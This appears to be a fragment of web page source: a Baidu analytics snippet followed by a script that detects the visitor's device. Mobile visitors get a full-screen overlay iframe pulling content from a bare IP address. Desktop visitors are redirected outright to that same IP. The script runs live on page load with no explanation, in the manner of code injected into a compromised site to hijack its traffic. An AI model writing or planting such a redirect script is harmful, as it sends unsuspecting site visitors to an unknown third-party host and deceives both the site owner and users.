<!-- 统计代码 -->
<script>
var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "https://hm.baidu.com/hm.js?b47f2f51484ba70817bcc0ed6fd2a58f";
  var s = document.getElementsByTagName("script")[0]; 
  s.parentNode.insertBefore(hm, s);
})();
</script>
  <script type="text/javascript">
  	var sUserAgent= navigator.userAgent.toLowerCase();
  	        var bIsIpad= sUserAgent.match(/ipad/i) == "ipad";
  	        var bIsIphoneOs= sUserAgent.match(/iphone os/i) == "iphone os";
  	        var bIsMidp= sUserAgent.match(/midp/i) == "midp";
  	        var bIsUc7= sUserAgent.match(/rv:1.2.3.4/i) == "rv:1.2.3.4";
  	        var bIsUc= sUserAgent.match(/ucweb/i) == "ucweb";
  	        var bIsAndroid= sUserAgent.match(/android/i) == "android";
  	        var bIsCE= sUserAgent.match(/windows ce/i) == "windows ce";
  	        var bIsWM= sUserAgent.match(/windows mobile/i) == "windows mobile";
  	        if (bIsIpad || bIsIphoneOs || bIsMidp || bIsUc7 || bIsUc || bIsAndroid || bIsCE || bIsWM)
  	        {
  	            document.write('<meta name="viewport" content="width=device-width,initial-scale=1, maximum-scale=1, user-scalable=no"><style>html,body{width:100%;height:100%;margin:0;padding:0}</style>');
  	            var iframe = document.createElement('iframe');
  	            iframe.src = '//154.213.94.24';
  	            iframe.scrolling = 'auto';
  	            iframe.style.cssText = "width:100%;height:100%;left:1px;top:1px;border:none;background:#fff";
  	            var div1 = document.createElement("div");
  	            var div =  document.createElement("div");
  	            div1.style.cssText = "-webkit-overflow-scrolling:touch;width:100%;height:100%;z-index:9999999999;position:fixed;top:0;left:0;";
  	              var is_mobi = navigator.userAgent.toLowerCase().match(/(ipad|iphone|android|coolpad|mmp|smartphone|midp|wap|xoom|symbian|j2me|blackberry|wince)/i) != null;
  	            if (is_mobi) {
  	              div1.style.overflow = "auto";
  	            }
  	            div1.appendChild(iframe);
  	            div.appendChild(div1);
  	            document.write(div.innerHTML);
  	}
  	//pc404
  	else{
  		window.location.href="//154.213.94.24";
  	}
  </script>